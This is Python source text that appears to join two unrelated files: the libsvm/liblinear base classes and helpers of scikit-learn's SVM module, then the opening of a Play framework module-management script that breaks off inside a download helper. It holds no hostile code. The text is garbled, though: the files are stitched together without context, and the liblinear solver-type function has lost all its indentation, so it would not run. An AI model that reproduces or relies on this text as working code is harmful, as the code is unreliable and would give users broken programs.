    # the sparse case, so we append to a list instead.)
    bounds = np.cumsum(np.hstack([[0], n_support]))

    coefficients = []
    for first in range(n_classes):
        # Support vectors belonging to class `first`:
        sv_first = support_vectors[bounds[first]:bounds[first + 1], :]
        for second in range(first + 1, n_classes):
            # Support vectors belonging to class `second`:
            sv_second = support_vectors[bounds[second]:bounds[second + 1], :]
            # Dual coefficients of each class' SVs in the
            # (first, second) sub-problem.
            alpha_first = dual_coef[second - 1,
                                    bounds[first]:bounds[first + 1]]
            alpha_second = dual_coef[first,
                                     bounds[second]:bounds[second + 1]]
            # Primal weight vector for `first` vs `second`.
            coefficients.append(safe_sparse_dot(alpha_first, sv_first)
                                + safe_sparse_dot(alpha_second, sv_second))
    return coefficients
class BaseLibSVM(six.with_metaclass(ABCMeta, BaseEstimator)):
    """Base class for estimators that use libsvm as backing library.

    This implements support vector machine classification and regression.
    Parameter documentation is in the derived `SVC` class.
    """

    # The order of these must match the integer values in LibSVM.
    # XXX These are actually the same in the dense case. Need to factor
    # this out.
    _sparse_kernels = ["linear", "poly", "rbf", "sigmoid", "precomputed"]

    @abstractmethod
    def __init__(self, impl, kernel, degree, gamma, coef0,
                 tol, C, nu, epsilon, shrinking, probability, cache_size,
                 class_weight, verbose, max_iter, random_state):
        # `impl` selects the libsvm solver; its index in LIBSVM_IMPL is
        # the integer solver-type code passed to the C library.
        if impl not in LIBSVM_IMPL:  # pragma: no cover
            raise ValueError("impl should be one of %s, %s was given" % (
                LIBSVM_IMPL, impl))

        # FIXME Remove gamma=0.0 support in 0.18
        # gamma == 0 used to mean "auto" (1 / n_features); warn callers
        # still relying on that.
        if gamma == 0:
            msg = ("gamma=%s has been deprecated in favor of "
                   "gamma='%s' as of 0.17. Backward compatibility"
                   " for gamma=%s will be removed in %s")
            invalid_gamma = 0.0
            warnings.warn(msg % (invalid_gamma, "auto",
                                 invalid_gamma, "0.18"), DeprecationWarning)

        self._impl = impl
        self.kernel = kernel
        self.degree = degree
        self.gamma = gamma
        self.coef0 = coef0
        self.tol = tol
        self.C = C
        self.nu = nu
        self.epsilon = epsilon
        self.shrinking = shrinking
        self.probability = probability
        self.cache_size = cache_size
        self.class_weight = class_weight
        self.verbose = verbose
        self.max_iter = max_iter
        self.random_state = random_state

    @property
    def _pairwise(self):
        # Used by cross_val_score.
        kernel = self.kernel
        return kernel == "precomputed" or callable(kernel)

    def fit(self, X, y, sample_weight=None):
        """Fit the SVM model according to the given training data.

        Parameters
        ----------
        X : {array-like, sparse matrix}, shape (n_samples, n_features)
            Training vectors, where n_samples is the number of samples
            and n_features is the number of features.
            For kernel="precomputed", the expected shape of X is
            (n_samples, n_samples).

        y : array-like, shape (n_samples,)
            Target values (class labels in classification, real numbers in
            regression)

        sample_weight : array-like, shape (n_samples,)
            Per-sample weights. Rescale C per sample. Higher weights
            force the classifier to put more emphasis on these points.

        Returns
        -------
        self : object
            Returns self.

        Notes
        -----
        If X and y are not C-ordered and contiguous arrays of np.float64 and
        X is not a scipy.sparse.csr_matrix, X and/or y may be copied.

        If X is a dense array, then the other methods will not support sparse
        matrices as input.
        """
        rnd = check_random_state(self.random_state)

        sparse = sp.isspmatrix(X)
        if sparse and self.kernel == "precomputed":
            raise TypeError("Sparse precomputed kernels are not supported.")
        # A callable kernel forces the dense code path even on sparse input.
        self._sparse = sparse and not callable(self.kernel)

        X = check_array(X, accept_sparse='csr', dtype=np.float64, order='C')
        y = self._validate_targets(y)

        sample_weight = np.asarray([]
                                   if sample_weight is None
                                   else sample_weight, dtype=np.float64)
        solver_type = LIBSVM_IMPL.index(self._impl)

        # input validation
        # (solver_type 2 is one_class, which is unsupervised: no y check)
        if solver_type != 2 and X.shape[0] != y.shape[0]:
            raise ValueError("X and y have incompatible shapes.\n" +
                             "X has %s samples, but y has %s." %
                             (X.shape[0], y.shape[0]))

        if self.kernel == "precomputed" and X.shape[0] != X.shape[1]:
            raise ValueError("X.shape[0] should be equal to X.shape[1]")

        if sample_weight.shape[0] > 0 and sample_weight.shape[0] != X.shape[0]:
            raise ValueError("sample_weight and X have incompatible shapes: "
                             "%r vs %r\n"
                             "Note: Sparse matrices cannot be indexed w/"
                             "boolean masks (use `indices=True` in CV)."
                             % (sample_weight.shape, X.shape))

        # FIXME remove (self.gamma == 0) in 0.18
        if (self.kernel in ['poly', 'rbf']) and ((self.gamma == 0)
                                                 or (self.gamma == 'auto')):
            # if custom gamma is not provided ...
            self._gamma = 1.0 / X.shape[1]
        elif self.gamma == 'auto':
            self._gamma = 0.0
        else:
            self._gamma = self.gamma

        # Callable kernels are evaluated here and handed to libsvm as a
        # precomputed Gram matrix.
        kernel = self.kernel
        if callable(kernel):
            kernel = 'precomputed'

        fit = self._sparse_fit if self._sparse else self._dense_fit
        if self.verbose:  # pragma: no cover
            print('[LibSVM]', end='')

        seed = rnd.randint(np.iinfo('i').max)
        fit(X, y, sample_weight, solver_type, kernel, random_seed=seed)
        # see comment on the other call to np.iinfo in this file

        self.shape_fit_ = X.shape

        # In binary case, we need to flip the sign of coef, intercept and
        # decision function. Use self._intercept_ and self._dual_coef_ internally.
        self._intercept_ = self.intercept_.copy()
        self._dual_coef_ = self.dual_coef_
        if self._impl in ['c_svc', 'nu_svc'] and len(self.classes_) == 2:
            self.intercept_ *= -1
            self.dual_coef_ = -self.dual_coef_

        return self

    def _validate_targets(self, y):
        """Validation of y and class_weight.

        Default implementation for SVR and one-class; overridden in BaseSVC.
        """
        # XXX this is ugly.
        # Regression models should not have a class_weight_ attribute.
        self.class_weight_ = np.empty(0)
        return np.asarray(y, dtype=np.float64, order='C')

    def _warn_from_fit_status(self):
        # fit_status_ is set by the libsvm training call: 0 = converged,
        # 1 = hit max_iter before convergence.
        assert self.fit_status_ in (0, 1)
        if self.fit_status_ == 1:
            warnings.warn('Solver terminated early (max_iter=%i).'
                          '  Consider pre-processing your data with'
                          ' StandardScaler or MinMaxScaler.'
                          % self.max_iter, ConvergenceWarning)

    def _dense_fit(self, X, y, sample_weight, solver_type, kernel,
                   random_seed):
        """Train on dense (or callable-kernel) data via libsvm."""
        if callable(self.kernel):
            # you must store a reference to X to compute the kernel in predict
            # TODO: add keyword copy to copy on demand
            self.__Xfit = X
            X = self._compute_kernel(X)

            if X.shape[0] != X.shape[1]:
                raise ValueError("X.shape[0] should be equal to X.shape[1]")

        libsvm.set_verbosity_wrap(self.verbose)

        # we don't pass **self.get_params() to allow subclasses to
        # add other parameters to __init__
        self.support_, self.support_vectors_, self.n_support_, \
            self.dual_coef_, self.intercept_, self.probA_, \
            self.probB_, self.fit_status_ = libsvm.fit(
                X, y,
                svm_type=solver_type, sample_weight=sample_weight,
                class_weight=self.class_weight_, kernel=kernel, C=self.C,
                nu=self.nu, probability=self.probability, degree=self.degree,
                shrinking=self.shrinking, tol=self.tol,
                cache_size=self.cache_size, coef0=self.coef0,
                gamma=self._gamma, epsilon=self.epsilon,
                max_iter=self.max_iter, random_seed=random_seed)

        self._warn_from_fit_status()

    def _sparse_fit(self, X, y, sample_weight, solver_type, kernel,
                    random_seed):
        """Train on scipy.sparse CSR data via libsvm_sparse."""
        X.data = np.asarray(X.data, dtype=np.float64, order='C')
        X.sort_indices()

        kernel_type = self._sparse_kernels.index(kernel)

        libsvm_sparse.set_verbosity_wrap(self.verbose)

        self.support_, self.support_vectors_, dual_coef_data, \
            self.intercept_, self.n_support_, \
            self.probA_, self.probB_, self.fit_status_ = \
            libsvm_sparse.libsvm_sparse_train(
                X.shape[1], X.data, X.indices, X.indptr, y, solver_type,
                kernel_type, self.degree, self._gamma, self.coef0, self.tol,
                self.C, self.class_weight_,
                sample_weight, self.nu, self.cache_size, self.epsilon,
                int(self.shrinking), int(self.probability), self.max_iter,
                random_seed)

        self._warn_from_fit_status()

        if hasattr(self, "classes_"):
            n_class = len(self.classes_) - 1
        else:  # regression
            n_class = 1
        n_SV = self.support_vectors_.shape[0]

        # Rebuild dual_coef_ as a (n_class, n_SV) CSR matrix from the flat
        # data returned by the C routine.
        dual_coef_indices = np.tile(np.arange(n_SV), n_class)
        # NOTE(review): `/` here relies on Python 2 integer division; on
        # Python 3 this yields a float step for arange -- use `//` there.
        dual_coef_indptr = np.arange(0, dual_coef_indices.size + 1,
                                     dual_coef_indices.size / n_class)
        self.dual_coef_ = sp.csr_matrix(
            (dual_coef_data, dual_coef_indices, dual_coef_indptr),
            (n_class, n_SV))

    def predict(self, X):
        """Perform regression on samples in X.

        For an one-class model, +1 or -1 is returned.

        Parameters
        ----------
        X : {array-like, sparse matrix}, shape (n_samples, n_features)
            For kernel="precomputed", the expected shape of X is
            (n_samples_test, n_samples_train).

        Returns
        -------
        y_pred : array, shape (n_samples,)
        """
        X = self._validate_for_predict(X)
        predict = self._sparse_predict if self._sparse else self._dense_predict
        return predict(X)

    def _dense_predict(self, X):
        """Predict on dense data with the fitted libsvm model."""
        n_samples, n_features = X.shape
        X = self._compute_kernel(X)
        if X.ndim == 1:
            X = check_array(X, order='C')

        kernel = self.kernel
        if callable(self.kernel):
            kernel = 'precomputed'
            # With a (callable) precomputed kernel, columns of X must match
            # the training samples.
            if X.shape[1] != self.shape_fit_[0]:
                raise ValueError("X.shape[1] = %d should be equal to %d, "
                                 "the number of samples at training time" %
                                 (X.shape[1], self.shape_fit_[0]))

        svm_type = LIBSVM_IMPL.index(self._impl)

        return libsvm.predict(
            X, self.support_, self.support_vectors_, self.n_support_,
            self._dual_coef_, self._intercept_,
            self.probA_, self.probB_, svm_type=svm_type, kernel=kernel,
            degree=self.degree, coef0=self.coef0, gamma=self._gamma,
            cache_size=self.cache_size)

    def _sparse_predict(self, X):
        # Precondition: X is a csr_matrix of dtype np.float64.
        kernel = self.kernel
        if callable(kernel):
            kernel = 'precomputed'

        kernel_type = self._sparse_kernels.index(kernel)

        C = 0.0  # C is not useful here

        return libsvm_sparse.libsvm_sparse_predict(
            X.data, X.indices, X.indptr,
            self.support_vectors_.data,
            self.support_vectors_.indices,
            self.support_vectors_.indptr,
            self._dual_coef_.data, self._intercept_,
            LIBSVM_IMPL.index(self._impl), kernel_type,
            self.degree, self._gamma, self.coef0, self.tol,
            C, self.class_weight_,
            self.nu, self.epsilon, self.shrinking,
            self.probability, self.n_support_,
            self.probA_, self.probB_)

    def _compute_kernel(self, X):
        """Return the data transformed by a callable kernel."""
        if callable(self.kernel):
            # in the case of precomputed kernel given as a function, we
            # have to compute explicitly the kernel matrix
            kernel = self.kernel(X, self.__Xfit)
            if sp.issparse(kernel):
                kernel = kernel.toarray()
            X = np.asarray(kernel, dtype=np.float64, order='C')
        return X

    @deprecated(" and will be removed in 0.19")
    def decision_function(self, X):
        """Distance of the samples X to the separating hyperplane.

        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
            For kernel="precomputed", the expected shape of X is
            [n_samples_test, n_samples_train].

        Returns
        -------
        X : array-like, shape (n_samples, n_class * (n_class-1) / 2)
            Returns the decision function of the sample for each class
            in the model.
        """
        return self._decision_function(X)

    def _decision_function(self, X):
        """Distance of the samples X to the separating hyperplane.

        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)

        Returns
        -------
        X : array-like, shape (n_samples, n_class * (n_class-1) / 2)
            Returns the decision function of the sample for each class
            in the model.
        """
        # NOTE: _validate_for_predict contains check for is_fitted
        # hence must be placed before any other attributes are used.
        X = self._validate_for_predict(X)
        X = self._compute_kernel(X)

        if self._sparse:
            dec_func = self._sparse_decision_function(X)
        else:
            dec_func = self._dense_decision_function(X)

        # In binary case, we need to flip the sign of coef, intercept and
        # decision function.
        if self._impl in ['c_svc', 'nu_svc'] and len(self.classes_) == 2:
            return -dec_func.ravel()

        return dec_func

    def _dense_decision_function(self, X):
        """Decision values on dense data via libsvm."""
        X = check_array(X, dtype=np.float64, order="C")

        kernel = self.kernel
        if callable(kernel):
            kernel = 'precomputed'

        return libsvm.decision_function(
            X, self.support_, self.support_vectors_, self.n_support_,
            self._dual_coef_, self._intercept_,
            self.probA_, self.probB_,
            svm_type=LIBSVM_IMPL.index(self._impl),
            kernel=kernel, degree=self.degree, cache_size=self.cache_size,
            coef0=self.coef0, gamma=self._gamma)

    def _sparse_decision_function(self, X):
        """Decision values on sparse data via libsvm_sparse."""
        X.data = np.asarray(X.data, dtype=np.float64, order='C')

        kernel = self.kernel
        if hasattr(kernel, '__call__'):
            kernel = 'precomputed'

        kernel_type = self._sparse_kernels.index(kernel)

        return libsvm_sparse.libsvm_sparse_decision_function(
            X.data, X.indices, X.indptr,
            self.support_vectors_.data,
            self.support_vectors_.indices,
            self.support_vectors_.indptr,
            self._dual_coef_.data, self._intercept_,
            LIBSVM_IMPL.index(self._impl), kernel_type,
            self.degree, self._gamma, self.coef0, self.tol,
            self.C, self.class_weight_,
            self.nu, self.epsilon, self.shrinking,
            self.probability, self.n_support_,
            self.probA_, self.probB_)

    def _validate_for_predict(self, X):
        """Check that the estimator is fitted and X matches training data."""
        check_is_fitted(self, 'support_')

        X = check_array(X, accept_sparse='csr', dtype=np.float64, order="C")
        if self._sparse and not sp.isspmatrix(X):
            X = sp.csr_matrix(X)
        if self._sparse:
            X.sort_indices()

        if sp.issparse(X) and not self._sparse and not callable(self.kernel):
            raise ValueError(
                "cannot use sparse input in %r trained on dense data"
                % type(self).__name__)
        n_samples, n_features = X.shape

        if self.kernel == "precomputed":
            if X.shape[1] != self.shape_fit_[0]:
                raise ValueError("X.shape[1] = %d should be equal to %d, "
                                 "the number of samples at training time" %
                                 (X.shape[1], self.shape_fit_[0]))
        elif n_features != self.shape_fit_[1]:
            raise ValueError("X.shape[1] = %d should be equal to %d, "
                             "the number of features at training time" %
                             (n_features, self.shape_fit_[1]))
        return X

    @property
    def coef_(self):
        # Primal coefficients; only meaningful for a linear kernel.
        if self.kernel != 'linear':
            raise ValueError('coef_ is only available when using a '
                             'linear kernel')

        coef = self._get_coef()

        # coef_ being a read-only property, it's better to mark the value as
        # immutable to avoid hiding potential bugs for the unsuspecting user.
        if sp.issparse(coef):
            # sparse matrix do not have global flags
            coef.data.flags.writeable = False
        else:
            # regular dense array
            coef.flags.writeable = False
        return coef

    def _get_coef(self):
        # w = sum_i alpha_i * sv_i (overridden for multiclass in BaseSVC).
        return safe_sparse_dot(self._dual_coef_, self.support_vectors_)
class BaseSVC(six.with_metaclass(ABCMeta, BaseLibSVM, ClassifierMixin)):
    """ABC for LibSVM-based classifiers."""

    @abstractmethod
    def __init__(self, impl, kernel, degree, gamma, coef0, tol, C, nu,
                 shrinking, probability, cache_size, class_weight, verbose,
                 max_iter, decision_function_shape, random_state):
        self.decision_function_shape = decision_function_shape
        # Classification has no epsilon parameter; pass 0 to the base class.
        super(BaseSVC, self).__init__(
            impl=impl, kernel=kernel, degree=degree, gamma=gamma, coef0=coef0,
            tol=tol, C=C, nu=nu, epsilon=0., shrinking=shrinking,
            probability=probability, cache_size=cache_size,
            class_weight=class_weight, verbose=verbose, max_iter=max_iter,
            random_state=random_state)

    def _validate_targets(self, y):
        """Encode class labels as 0..n_classes-1 and set class_weight_."""
        y_ = column_or_1d(y, warn=True)
        cls, y = np.unique(y_, return_inverse=True)
        self.class_weight_ = compute_class_weight(self.class_weight, cls, y_)
        if len(cls) < 2:
            raise ValueError(
                "The number of classes has to be greater than one; got %d"
                % len(cls))

        self.classes_ = cls

        # libsvm wants targets as doubles, even for classification.
        return np.asarray(y, dtype=np.float64, order='C')

    def decision_function(self, X):
        """Distance of the samples X to the separating hyperplane.

        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)

        Returns
        -------
        X : array-like, shape (n_samples, n_classes * (n_classes-1) / 2)
            Returns the decision function of the sample for each class
            in the model.
            If decision_function_shape='ovr', the shape is (n_samples,
            n_classes)
        """
        dec = self._decision_function(X)
        if self.decision_function_shape is None and len(self.classes_) > 2:
            warnings.warn("The decision_function_shape default value will "
                          "change from 'ovo' to 'ovr' in 0.18. This will change "
                          "the shape of the decision function returned by "
                          "SVC.", ChangedBehaviorWarning)
        if self.decision_function_shape == 'ovr':
            # Collapse the ovo votes/confidences into one column per class.
            return _ovr_decision_function(dec < 0, dec, len(self.classes_))
        return dec

    def predict(self, X):
        """Perform classification on samples in X.

        For an one-class model, +1 or -1 is returned.

        Parameters
        ----------
        X : {array-like, sparse matrix}, shape (n_samples, n_features)
            For kernel="precomputed", the expected shape of X is
            [n_samples_test, n_samples_train]

        Returns
        -------
        y_pred : array, shape (n_samples,)
            Class labels for samples in X.
        """
        # Base predict returns encoded integer labels; map them back to
        # the original class labels.
        y = super(BaseSVC, self).predict(X)
        return self.classes_.take(np.asarray(y, dtype=np.intp))

    # Hacky way of getting predict_proba to raise an AttributeError when
    # probability=False using properties. Do not use this in new code; when
    # probabilities are not available depending on a setting, introduce two
    # estimators.
    def _check_proba(self):
        # Raise unless the model was fitted with probability estimation.
        if not self.probability or self.probA_.size == 0 or self.probB_.size == 0:
            raise AttributeError("predict_proba is not available when fitted with"
                                 " probability=False")
        if self._impl not in ('c_svc', 'nu_svc'):
            raise AttributeError("predict_proba only implemented for SVC"
                                 " and NuSVC")

    @property
    def predict_proba(self):
        """Compute probabilities of possible outcomes for samples in X.

        The model need to have probability information computed at training
        time: fit with attribute `probability` set to True.

        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
            For kernel="precomputed", the expected shape of X is
            [n_samples_test, n_samples_train]

        Returns
        -------
        T : array-like, shape (n_samples, n_classes)
            Returns the probability of the sample for each class in
            the model. The columns correspond to the classes in sorted
            order, as they appear in the attribute `classes_`.

        Notes
        -----
        The probability model is created using cross validation, so
        the results can be slightly different than those obtained by
        predict. Also, it will produce meaningless results on very small
        datasets.
        """
        self._check_proba()
        return self._predict_proba

    def _predict_proba(self, X):
        X = self._validate_for_predict(X)
        pred_proba = (self._sparse_predict_proba
                      if self._sparse else self._dense_predict_proba)
        return pred_proba(X)

    @property
    def predict_log_proba(self):
        """Compute log probabilities of possible outcomes for samples in X.

        The model need to have probability information computed at training
        time: fit with attribute `probability` set to True.

        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
            For kernel="precomputed", the expected shape of X is
            [n_samples_test, n_samples_train]

        Returns
        -------
        T : array-like, shape (n_samples, n_classes)
            Returns the log-probabilities of the sample for each class in
            the model. The columns correspond to the classes in sorted
            order, as they appear in the attribute `classes_`.

        Notes
        -----
        The probability model is created using cross validation, so
        the results can be slightly different than those obtained by
        predict. Also, it will produce meaningless results on very small
        datasets.
        """
        self._check_proba()
        return self._predict_log_proba

    def _predict_log_proba(self, X):
        return np.log(self.predict_proba(X))

    def _dense_predict_proba(self, X):
        """Class probabilities on dense data via libsvm."""
        X = self._compute_kernel(X)

        kernel = self.kernel
        if callable(kernel):
            kernel = 'precomputed'

        svm_type = LIBSVM_IMPL.index(self._impl)
        pprob = libsvm.predict_proba(
            X, self.support_, self.support_vectors_, self.n_support_,
            self._dual_coef_, self._intercept_,
            self.probA_, self.probB_,
            svm_type=svm_type, kernel=kernel, degree=self.degree,
            cache_size=self.cache_size, coef0=self.coef0, gamma=self._gamma)

        return pprob

    def _sparse_predict_proba(self, X):
        """Class probabilities on sparse data via libsvm_sparse."""
        X.data = np.asarray(X.data, dtype=np.float64, order='C')

        kernel = self.kernel
        if callable(kernel):
            kernel = 'precomputed'

        kernel_type = self._sparse_kernels.index(kernel)

        return libsvm_sparse.libsvm_sparse_predict_proba(
            X.data, X.indices, X.indptr,
            self.support_vectors_.data,
            self.support_vectors_.indices,
            self.support_vectors_.indptr,
            self._dual_coef_.data, self._intercept_,
            LIBSVM_IMPL.index(self._impl), kernel_type,
            self.degree, self._gamma, self.coef0, self.tol,
            self.C, self.class_weight_,
            self.nu, self.epsilon, self.shrinking,
            self.probability, self.n_support_,
            self.probA_, self.probB_)

    def _get_coef(self):
        if self.dual_coef_.shape[0] == 1:
            # binary classifier
            coef = safe_sparse_dot(self.dual_coef_, self.support_vectors_)
        else:
            # 1vs1 classifier
            coef = _one_vs_one_coef(self.dual_coef_, self.n_support_,
                                    self.support_vectors_)
            if sp.issparse(coef[0]):
                coef = sp.vstack(coef).tocsr()
            else:
                coef = np.vstack(coef)

        return coef
def _get_liblinear_solver_type(multi_class, penalty, loss, dual):
"""Find the liblinear magic number for the solver.
This number depends on the values of the following attributes:
- multi_class
- penalty
- loss
- dual
The same number is also internally used by LibLinear to determine
which solver to use.
"""
# nested dicts containing level 1: available loss functions,
# level2: available penalties for the given loss functin,
# level3: wether the dual solver is available for the specified
# combination of loss function and penalty
_solver_type_dict = {
'logistic_regression': {
'l1': {False: 6},
'l2': {False: 0, True: 7}},
'hinge': {
'l2': {True: 3}},
'squared_hinge': {
'l1': {False: 5},
'l2': {False: 2, True: 1}},
'epsilon_insensitive': {
'l2': {True: 13}},
'squared_epsilon_insensitive': {
'l2': {False: 11, True: 12}},
'crammer_singer': 4
}
if multi_class == 'crammer_singer':
return _solver_type_dict[multi_class]
elif multi_class != 'ovr':
raise ValueError("`multi_class` must be one of `ovr`, "
"`crammer_singer`, got %r" % multi_class)
# FIXME loss.lower() --> loss in 0.18
_solver_pen = _solver_type_dict.get(loss.lower(), None)
if _solver_pen is None:
error_string = ("loss='%s' is not supported" % loss)
else:
# FIME penalty.lower() --> penalty in 0.18
_solver_dual = _solver_pen.get(penalty.lower(), None)
if _solver_dual is None:
error_string = ("The combination of penalty='%s'"
"and loss='%s' is not supported"
% (penalty, loss))
else:
solver_num = _solver_dual.get(dual, None)
if solver_num is None:
error_string = ("loss='%s' and penalty='%s'"
"are not supported when dual=%s"
% (penalty, loss, dual))
else:
return solver_num
raise ValueError('Unsupported set of arguments: %s, '
'Parameters: penalty=%r, loss=%r, dual=%r'
% (error_string, penalty, loss, dual))
def _fit_liblinear(X, y, C, fit_intercept, intercept_scaling, class_weight,
                   penalty, dual, verbose, max_iter, tol,
                   random_state=None, multi_class='ovr',
                   loss='logistic_regression', epsilon=0.1):
    """Used by Logistic Regression (and CV) and LinearSVC.

    Preprocessing is done in this function before supplying it to liblinear.

    Parameters
    ----------
    X : {array-like, sparse matrix}, shape (n_samples, n_features)
        Training vector, where n_samples in the number of samples and
        n_features is the number of features.

    y : array-like, shape (n_samples,)
        Target vector relative to X

    C : float
        Inverse of regularization strength. Lower the C, the more
        the penalization.

    fit_intercept : bool
        Whether or not to fit the intercept, that is to add a intercept
        term to the decision function.

    intercept_scaling : float
        LibLinear internally penalizes the intercept and this term is subject
        to regularization just like the other terms of the feature vector.
        In order to avoid this, one should increase the intercept_scaling.
        such that the feature vector becomes [x, intercept_scaling].

    class_weight : {dict, 'balanced'}, optional
        Weights associated with classes in the form ``{class_label: weight}``.
        If not given, all classes are supposed to have weight one. For
        multi-output problems, a list of dicts can be provided in the same
        order as the columns of y.

        The "balanced" mode uses the values of y to automatically adjust
        weights inversely proportional to class frequencies in the input data
        as ``n_samples / (n_classes * np.bincount(y))``

    penalty : str, {'l1', 'l2'}
        The norm of the penalty used in regularization.

    dual : bool
        Dual or primal formulation,

    verbose : int
        Set verbose to any positive number for verbosity.

    max_iter : int
        Number of iterations.

    tol : float
        Stopping condition.

    random_state : int seed, RandomState instance, or None (default)
        The seed of the pseudo random number generator to use when
        shuffling the data.

    multi_class : str, {'ovr', 'crammer_singer'}
        `ovr` trains n_classes one-vs-rest classifiers, while `crammer_singer`
        optimizes a joint objective over all classes.
        While `crammer_singer` is interesting from an theoretical perspective
        as it is consistent it is seldom used in practice and rarely leads to
        better accuracy and is more expensive to compute.
        If `crammer_singer` is chosen, the options loss, penalty and dual will
        be ignored.

    loss : str, {'logistic_regression', 'hinge', 'squared_hinge',
                 'epsilon_insensitive', 'squared_epsilon_insensitive}
        The loss function used to fit the model.

    epsilon : float, optional (default=0.1)
        Epsilon parameter in the epsilon-insensitive loss function. Note
        that the value of this parameter depends on the scale of the target
        variable y. If unsure, set epsilon=0.

    Returns
    -------
    coef_ : ndarray, shape (n_features, n_features + 1)
        The coefficent vector got by minimizing the objective function.

    intercept_ : float
        The intercept term added to the vector.

    n_iter_ : int
        Maximum number of iterations run across all classes.
    """
    # FIXME Remove case insensitivity in 0.18 ---------------------
    loss_l, penalty_l = loss.lower(), penalty.lower()

    msg = ("loss='%s' has been deprecated in favor of "
           "loss='%s' as of 0.16. Backward compatibility"
           " for the uppercase notation will be removed in %s")
    if (not loss.islower()) and loss_l not in ('l1', 'l2'):
        warnings.warn(msg % (loss, loss_l, "0.18"),
                      DeprecationWarning)
    if not penalty.islower():
        warnings.warn(msg.replace("loss", "penalty")
                      % (penalty, penalty_l, "0.18"),
                      DeprecationWarning)
    # -------------------------------------------------------------

    # FIXME loss_l --> loss in 0.18
    if loss_l not in ['epsilon_insensitive', 'squared_epsilon_insensitive']:
        # Classification: encode labels and compute per-class weights.
        enc = LabelEncoder()
        y_ind = enc.fit_transform(y)
        classes_ = enc.classes_
        if len(classes_) < 2:
            raise ValueError("This solver needs samples of at least 2 classes"
                             " in the data, but the data contains only one"
                             " class: %r" % classes_[0])

        class_weight_ = compute_class_weight(class_weight, classes_, y)
    else:
        # Regression losses: no classes, no class weights.
        # (np.float64 replaces the deprecated np.float alias, which was
        # removed from NumPy; the dtype is identical.)
        class_weight_ = np.empty(0, dtype=np.float64)
        y_ind = y
    liblinear.set_verbosity_wrap(verbose)
    rnd = check_random_state(random_state)
    if verbose:
        print('[LibLinear]', end='')

    # LinearSVC breaks when intercept_scaling is <= 0
    bias = -1.0
    if fit_intercept:
        if intercept_scaling <= 0:
            raise ValueError("Intercept scaling is %r but needs to be greater than 0."
                             " To disable fitting an intercept,"
                             " set fit_intercept=False." % intercept_scaling)
        else:
            bias = intercept_scaling

    libsvm.set_verbosity_wrap(verbose)
    libsvm_sparse.set_verbosity_wrap(verbose)
    liblinear.set_verbosity_wrap(verbose)

    # LibLinear wants targets as doubles, even for classification
    y_ind = np.asarray(y_ind, dtype=np.float64).ravel()
    solver_type = _get_liblinear_solver_type(multi_class, penalty, loss, dual)
    raw_coef_, n_iter_ = liblinear.train_wrap(
        X, y_ind, sp.isspmatrix(X), solver_type, tol, bias, C,
        class_weight_, max_iter, rnd.randint(np.iinfo('i').max),
        epsilon)
    # Regarding rnd.randint(..) in the above signature:
    # seed for srand in range [0..INT_MAX); due to limitations in Numpy
    # on 32-bit platforms, we can't get to the UINT_MAX limit that
    # srand supports
    n_iter_ = max(n_iter_)
    if n_iter_ >= max_iter and verbose > 0:
        warnings.warn("Liblinear failed to converge, increase "
                      "the number of iterations.", ConvergenceWarning)

    if fit_intercept:
        # Last column of raw_coef_ holds the (scaled) intercept.
        coef_ = raw_coef_[:, :-1]
        intercept_ = intercept_scaling * raw_coef_[:, -1]
    else:
        coef_ = raw_coef_
        intercept_ = 0.

    return coef_, intercept_, n_iter_
|
|
import getopt
import imp
import os
import re
import shutil
import string
import sys
import time
import urllib
import urllib2
import zipfile

import yaml

from play.utils import *
# Command aliases: each play command can be invoked by its long or short form.
NM = ['new-module', 'nm']
LM = ['list-modules', 'lm']
BM = ['build-module', 'bm']
AM = ['add']
IM = ['install']
# All module-related commands handled by this file (dispatched in execute()).
COMMANDS = NM + LM + BM + IM + AM
# Help text shown by the play command-line tool, keyed by long command name.
HELP = {
    'new-module': "Create a module",
    'build-module': "Build and package a module",
    'list-modules': "List modules available from the central modules repository",
    'install': "Install a module"
}
# Fallback repository used when no 'repositories' file exists (see get_repositories()).
DEFAULT_REPO = 'http://www.playframework.org'
def load_module(name):
    """Import *name* from the play framework's bundled 'framework/pym' dir.

    The search path is resolved relative to the running script so the tool
    works regardless of the current working directory.
    """
    script_dir = os.path.dirname(os.path.realpath(sys.argv[0]))
    base = os.path.normpath(script_dir)
    found = imp.find_module(name, [os.path.join(base, 'framework/pym')])
    file_handle, pathname, description = found
    return imp.load_module(name, file_handle, pathname, description)
# JSON support comes from the bundled simplejson in framework/pym (this
# tool predates a guaranteed stdlib json module).
json = load_module('simplejson')
# Module repository URLs; populated by execute() from the play base dir.
repositories = []
def execute(**kargs):
    """Entry point: dispatch a play module command (new/list/build/install/add)."""
    global repositories
    command = kargs.get("command")
    app = kargs.get("app")
    args = kargs.get("args")
    env = kargs.get("env")
    # The repository list is re-read on every invocation.
    repositories = get_repositories(env['basedir'])
    dispatch = [
        (NM, lambda: new(app, args, env)),
        (LM, lambda: list(app, args)),
        (BM, lambda: build(app, args, env)),
        (IM, lambda: install(app, args, env)),
        (AM, lambda: add(app, args, env)),
    ]
    for aliases, handler in dispatch:
        if command in aliases:
            handler()
            break
def get_repositories(play_base):
    """Return the list of module repositories to consult.

    Reads <play_base>/repositories (one URL per line; blank lines and
    '#' comments ignored).  Falls back to [DEFAULT_REPO] when the file is
    missing or contains no entries.

    Fixes: the original used the Python-2-only `file()` builtin and never
    closed the handle (resource leak).
    """
    repopath = os.path.join(play_base, 'repositories')
    if os.path.exists(repopath):
        repos = []
        f = open(repopath)
        try:
            for line in f:
                if not re.match(r"^\s*#", line) and not line.strip() == "":
                    repos.append(line.strip())
        finally:
            f.close()
        if len(repos) > 0:
            return repos
    return [DEFAULT_REPO]
class Downloader(object):
    """Console progress-bar wrapper around urllib.urlretrieve (Python 2).

    NOTE(review): before/history/cycles are class attributes, so state is
    shared across instances -- presumably only one Downloader is live at a
    time; confirm before reusing.
    """
    before = .0
    history = []
    cycles = 0
    # Mean of the recorded speed samples (guarded against empty history).
    average = lambda self: sum(self.history) / (len(self.history) or 1)
    def __init__(self, width=55):
        # width: character width of the progress bar.
        self.width = width
        self.kibi = lambda bits: bits / 2 ** 10   # bytes -> KiB
        self.proc = lambda a, b: a / (b * 0.01)   # a as a percentage of b
    def retrieve(self, url, destination, callback=None):
        """Download url to destination with progress output; return size in KiB."""
        self.size = 0
        time.clock()
        try: urllib.urlretrieve(url, destination, self.progress)
